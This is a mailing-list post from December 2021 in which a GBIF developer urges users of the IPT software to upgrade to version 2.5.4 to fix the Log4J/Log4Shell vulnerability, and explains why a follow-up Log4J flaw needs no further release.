[IPT] IPT security update (Log4J / Log4Shell exploit)
Matthew Blissett
mblissett at gbif.org
Wed Dec 15 15:19:21 UTC 2021
Dear IPT users,
Yesterday, the developers of the Log4J library used by the IPT issued a
further security update, described at [1]. It is less severe than the
first problem, since it does not allow attackers to run their own code
on a hacked server.
The IPT does not use this part of Log4J, so we will not release a new
version of the IPT for this.
It's still important to upgrade to version 2.5.4, containing Log4J
version 2.15.0, as described in the email below.
Best regards,
Matthew
[1]
https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
On 11/12/2021 10:55, Matthew Blissett wrote:
> Dear IPT users,
>
> We have released a new version of the IPT, version 2.5.4 [1]. This
> version contains fixes to critical security issues with the Struts and
> Log4J[2] libraries.
>
> According to the press [3], the problem with the Log4J library
> vulnerability is being exploited by malicious users — and I can
> already see queries containing "jndi" in the web server logs for the
> IPTs GBIF hosts at cloud.gbif.org, although they are random attempts
> and would not succeed.
>
> All users are highly encouraged to upgrade to this version as soon as
> possible.
>
> As usual, upgrade and installation instructions are in the manual [1].
> Please remember to check your data directory backup is working before
> starting the upgrade.
>
> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
>
> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
>
> [3]
> https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
>
> Best regards,
>
> Matthew
>
>
> _______________________________________________
> IPT mailing list
> IPT at lists.gbif.org
> https://lists.gbif.org/mailman/listinfo/ipt
More information about the IPT
mailing list